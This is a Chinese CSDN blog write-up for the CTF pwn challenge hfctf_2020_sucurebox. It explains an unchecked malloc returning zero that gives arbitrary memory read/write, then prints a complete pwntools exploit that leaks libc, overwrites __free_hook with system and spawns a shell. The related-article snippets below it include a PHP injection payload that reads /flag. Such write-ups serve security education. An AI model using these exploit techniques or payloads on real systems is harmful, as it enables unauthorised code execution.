hfctf_2020_sucurebox(0地址引用)

最新推荐文章于 2022-08-12 22:59:58 发布
最新推荐文章于 2022-08-12 22:59:58 发布
阅读量568 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106687358
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

hfctf_2020_sucurebox(0地址引用)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在add功能里,size的判断不准确,导致size可以很大,使得malloc(size)返回0,但是没有检查malloc的返回值

然后,edit功能里可以指定offset和len,这样,我们就能在整个内存里进行读写了。

#coding:utf8
from pwn import *

#sh = process('./hfctf_2020_sucurebox')
sh = remote('node3.buuoj.cn',25367)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def add(size):
   sh.sendlineafter('5.Exit','1')
   sh.sendlineafter('Size:',str(size))
   sh.recvuntil('Key:')
   sh.recvuntil('\n')
   strs = sh.recvuntil('\n',drop = True).strip().split(' ')
   data = []
   for x in strs:
      if x == '':
         continue
      data.append(int(x,16))
   return data

def delete(index):
   sh.sendlineafter('5.Exit','2')
   sh.sendlineafter('Box ID:',str(index))

def enc(index,off,len,msg):
   sh.sendlineafter('5.Exit','3')
   sh.sendlineafter('Box ID:',str(index))
   sh.sendlineafter('Offset of msg:',str(off))
   sh.sendlineafter('Len of msg:',str(len))
   sh.sendafter('Msg:',msg)

def show(index,off,len):
   sh.sendlineafter('5.Exit','4')
   sh.sendlineafter('Box ID:',str(index))
   sh.sendlineafter('Offset of msg:',str(off))
   sh.sendlineafter('Len of msg:',str(len))

def tranLong(data):
   if data & 0x8000000000000000 != 0:
      return data - 0x10000000000000000
   else:
      return data

for i in range(8):
   add(0x200)
for i in range(1,8):
   delete(i)
delete(0)
key = add(0x200) #0
data = '/bin/sh\x00'
ans = ''
for i in range(8):
   ans += p8(ord(data[i]) ^ key[i])
enc(0,0,0x8,ans)

for i in range(7):
   add(0x200)

show(7,0x8,0x8)
sh.recvuntil('Msg:')
sh.recvuntil('\n')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
#malloc返回0,由于程序没有检查,所以可以任意地址读写
key = add(tranLong(0xFFFFFFFF00000FFF))
data = p64(system_addr)
ans = ''
for i in range(8):
   ans += p8(ord(data[i]) ^ key[i])
enc(8,tranLong(free_hook_addr),8,ans)
#getshell
delete(0)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HFCTF-2021-Final-easyflask
snowlyzz的博客
09-04 729
flask_session
HFCTF2021复现
as you know, nlp is fantasitc!
03-16 1157
[HFCTF2021 Quals]Unsetme 1、F3框架,unset将参数a拼接进去,可以闭合 2、测试 ​ payload ?a=a%0a);%0aphpinfo( 3、读取flag ?a=a%0a);%0aecho file_get_contents(%27/flag%27 [HFCTF 2021 Final]easyflask 1、源码,很明显的pickle反序列化 pickle官方文档 #!/usr/bin/python3.6 import os import pickle fro
HFCTF学习JWT伪造
蚁景网安学院
04-23 1196
刚打完比赛,来总结下
[HFCTF2020]JustEscape 记录
SopRomeo的博客
09-16 1862
最近开学一堆屁事,电脑 又发疯。。。 佛了 抓个包瞅瞅 计算的时候注意将计算符号进行url编码 再传入new date会显示当前时间
buuoj Pwn writeup 236-240
yongbaoii的博客
08-31 436
236 qctf_2018_dice_game 逻辑也是比较的简单。 有个随机数,在栈上,有个栈溢出,答对五十次就可以了。 但是我们可以直接覆盖种子 种子也覆盖成0.这样我们就可以知道第一个数是多少了。 溢出一下就可以了。 exp #-*- coding:utf-8 -*- from pwn import* from ctypes import* context.log_level="debug" r=remote("node4.buuoj.cn","27598") lib = cdll.LoadLi
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
2022HFCTF-线上赛官方Writeup1
08-04
HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1 本文将围绕HFCTF-江苏翔信二队-Writeup1的 Writeup1,详细介绍该挑战题的知识点和解决思路。 首先,让我们来看一下题目的描述和标签。题目描述为空,标签包含“测试软件/插件 ...
CTF 湖湘杯 决赛 2021 final.zip
12-07
CTF 湖湘杯 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘杯作为一项知名的CTF比赛,旨在促进网络安全...
第13周做题记录1
08-08
第二个挑战是HFCTF 2021 Final的hatenum。在这个挑战中,源代码被直接提供,我们需要寻找SQL注入的漏洞。登录过程的SQL查询语句在用户输入的用户名和密码未经充分过滤的情况下直接插入,这为SQL注入提供了可能。虽然...
hfctf_2020_marksman
z1r0的博客
03-20 537
hfctf_2020_marksman 查看保护 这里输入地址,然后改这个地址的低三个字节,也就是任意地址写三字节 攻击思路:这里最关键是需要劫持哪一个地址然后跳转到哪一个gadget。 为什么会说跳转到哪一个gadget? 在这个函数中会将一些gadget给禁用掉,举第一个例子 可以看到这个gadget被禁用了。 1.首先题目给了puts的地址。拿到Libc 2.写入要覆盖的地址,这里可以选择libc的got地址(这里笔者也学到了.got.plt一般是可写的,查看保护看的只是got表不可写而已,笔
hfctf_2020_marksman(劫持exit_hook或dlopen)
最新发布
tbsqigongzi的博客
08-12 1054
劫持exit_hook或dlopen
HFCTF2020 web writeup
a3320315的博客
04-21 3074
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6656
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
2021[HFCTF]虎符杯网络安全赛道re部分wp
n1ptune__的博客
04-07 1314
CrackMe 这题是使用c++写的,因为无符号表,ida对c++的解析不是很友好,可以去了解一下c++的string类型的结构,对解题很有帮助,推荐看这篇文章链接: https://bbs.pediy.com/thread-230312.htm. 程序先将长度为17位的输入分为7位和10位两部分 再输入一个数要求满足一定条件 直接爆破 #include <stdio.h> #include <stdlib.h> #include <math.h> double f
2020数字中国虎符CTF-PWN-count writeup
qq_41743240的博客
04-19 2884
检查程序保护 在运行时可以发现,无法执行二进制文件: 可执行文件格式错误 但是程序可以进行IDA反编译 找到sub_400990函数 __int64 sub_400990() { unsigned int v0; // w0 __int64 v1; // x0 __int64 v2; // x0 __int64 v3; // x0 __int64 v4; // x0 _...
第五空间ctf2020pwn-twice
qq_36495104的博客
06-25 624
checsec ida main函数 int __cdecl main(int argc, const char **argv, const char **envp) { for ( nCount = InitData(); (unsigned int)sub_4007A9(nCount); ++nCount ) ; return 0; } sub_4007A9函数 // a1=ncount __int64 __fastcall sub_4007A9(int a1) { unsign
buuoj Pwn writeup 151-155
yongbaoii的博客
05-28 374
151 ciscn_2019_sw_1 保护 要注意到的是RELRO一点没开,这意味着.fini_array是可以覆盖的。 栈上的格式化字符串。 system也有了。 printf只能用一次,但是我们前面说.fini_array可以覆盖,所以我们第一次先覆盖它为main,制造循环,然后劫持scanf的got表,进行利用就好。 要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数,而这个题.fini_array数组只有一个数组,所以我们只能通过它来返回一次main函数,所以我们一
[HFCTF 2021 Final]easyflask
SopRomeo的博客
04-29 5236
最近看到buu上了几个新题拿一个做做 按照提示得到源码 有个SECRET_KEY 还有个文件读取,这边禁用了黑名单,用绝对路径直接读/proc/self/environ试试 找到秘钥 glzjin22948575858jfjfjufirijidjitg3uiiuuh 继续看源码 下面有个反序列化的操作,思路不难了,pickle反序列化RCE 最好全程都在liunx环境下进行 import pickle from base64 import b64encode import os User = ty
HFCTF2022线上赛官方Writeup:WEB、CRYPTO与PWN挑战解析
"HFCTF2022线上赛官方Writeup1主要涵盖了多个网络安全和编程挑战,包括WEB、CRYPTO、PWN、REVERSE和MISC等类别。其中,题目涉及了RSA加密、MD5哈希、zlib压缩、SSRF漏洞利用、元数据解析、动态链接器预加载(ld_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值